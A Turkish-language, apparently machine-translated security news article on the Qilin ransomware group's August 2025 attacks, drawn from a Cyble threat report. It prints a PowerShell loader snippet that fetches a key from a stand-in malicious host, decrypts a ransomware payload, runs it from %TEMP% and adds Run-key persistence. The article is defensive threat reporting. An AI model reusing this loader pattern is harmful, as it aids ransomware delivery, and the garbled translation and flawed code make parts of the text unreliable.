Qilin grubu dünya çapında 104 ayrı saldırı için sorumluluk talep ettiği için fidye yazılımı tehdidi manzarası Ağustos 2025’te dramatik bir değişime tanık oldu.
Bu yılın başlarında ortaya çıkan Qilin, agresif çift uzatma taktikleri ve geniş bir bağlı işe alım stratejisi yoluyla hızla konumunu güçlendirdi.
İlk uzlaşmalar, ağırlıklı olarak kaldırılan açıkta kalan uzak masaüstü protokolü (RDP) sunucuları ve kamuya açık VPN ağ geçitleri ile fidye yazılımı yükünü dağıtmadan önce bağlı kuruluşların dayanaklar kurmasına izin vermiştir.
Üretimden profesyonel hizmetlere kadar sektörler arasında – Bictems ani sistem şifrelemesi bildirdi ve ardından veri hırsızlığı ve gasp talepleri.
Cyble’ın Ağustos Tehdit Peyzaj Raporu sadece Qilin’in saldırılarının hacmini değil, aynı zamanda araç ve kampanyalarının artan karmaşıklığını da vurgulamaktadır.
İştirakleri, ilk keşif yapmak için zayıf kimlik bilgilerini ve açılmamış güvenlik açıklarından yararlanmaktadır. Yanal hareketten sonra grup, ağa bağlı depolama paylaşımlarını ve kritik dosya sunucularını hedeflemek için tasarlanmış ısmarlama bir şifreleme ikili yürütür.
Qilin’in iddia edilen kurbanlarının küresel dağılımı, grubun Kuzey Amerika, Avrupa ve Asya’daki erişimini gösteriyor.
.webp)
Cyble analistleri, Qilin’in yükünün, dinamik olarak oluşturulan bir AES anahtarı kullanarak çalışma zamanında çekirdek fidye yazılımını şifresini çözen çok aşamalı bir yükleyici kullandığını belirtti.
Şifre çözüldükten sonra, yük, önceden tanımlanmış uzantılar için yerel dosya sistemini tarar – .docx– .xlsxVe .pdf-ve AES-CTR şifrelemesini uygular.
Dosya şifrelemesini takiben Qilin README_QILIN.txt. Mağdurlar Tor tabanlı bir ödeme portalına yönlendirilir ve ödeme alınmazsa kamu veri sızıntılarıyla tehdit edilir.
Kuruluşların talepleri göz ardı ettiği durumlarda, Qilin iştirakleri, 48 saat içinde sızıntı alanlarında söndürülmüş verileri yayınlamaya başladılar ve olay müdahaleleri üzerindeki baskıyı hızlandırdı.
Qilin’in operasyonlarının hızlı yükselmesi, Ağustos ayında en üretken fidye yazılımı grubu olarak işaret ediyor ve en yakın rakibi Akira’nın faaliyetini neredeyse iki katına çıkarıyor.
Saf bir hacmin ötesinde, Qilin’in gelişen araç seti – özellikle yükleyici ve şifreleme rutinleri – tespitten kaçınmak ve iyileştirmeyi engellemek için uyumlu bir çabayı gösteriyor.
Enfeksiyon mekanizması ve şifreleme iş akışı
Qilin’in enfeksiyon mekanizması, genellikle meşru yazılım güncellemelerini taklit etmek için adlandırılan kötü amaçlı bir zip arşivi yüklemesi ile başlar.
İnfaz üzerine, bir PowerShell One-Liner düşer ve bir başlatıcı ikili başlatır (qlnldr.exe) %TEMP% dizin. Başlatıcı daha sonra aşağıdaki adımları gerçekleştirir:-
# Qilin loader snippet: decrypt and execute core ransomware
$encKey = (Invoke-WebRequest "http://malicious[.]site/key").Content
$encryptedPayload = Get-Content "$env:TEMP\qln_core.bin" -AsByteStream
$decrypted = New-Object System.Security.Cryptography.AesCryptoServiceProvider
$decrypted. Key = [Convert]::FromBase64String($encKey)
$decrypted. Mode="CTR"
$transform = $decrypted.CreateDecryptor()
$coreBytes = $transform.TransformFinalBlock($encryptedPayload, 0, $encryptedPayload.Length)
[System.IO.File]::WriteAllBytes("$env:TEMP\qilin.exe", $coreBytes)
Start-Process "$env:TEMP\qilin.exe"Başlatma üzerine, qilin.exe Benzersiz bir AES Oturum anahtarı oluşturur, dosyaları eşlenmiş sürücüler arasında şifreler ve hassas belgeleri bir HTTPS kanalı üzerinden püskürtür.
Yükleyiciyi kaydederek kalıcılık elde edilir. HKCU\Software\Microsoft\Windows\CurrentVersion\Run Kayıt Defteri Anahtarı, yeniden başlattıktan sonra yürütmenin sağlanması.
Yükleyicinin şifre çözme dizisi ve kayıt defteri kalıcılık mekanizması, Qilin’in enfeksiyon zincirine görünürlüğü ve savunuculara hedeflenen algılama kurallarını hazırlamaya yardımcı olur.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.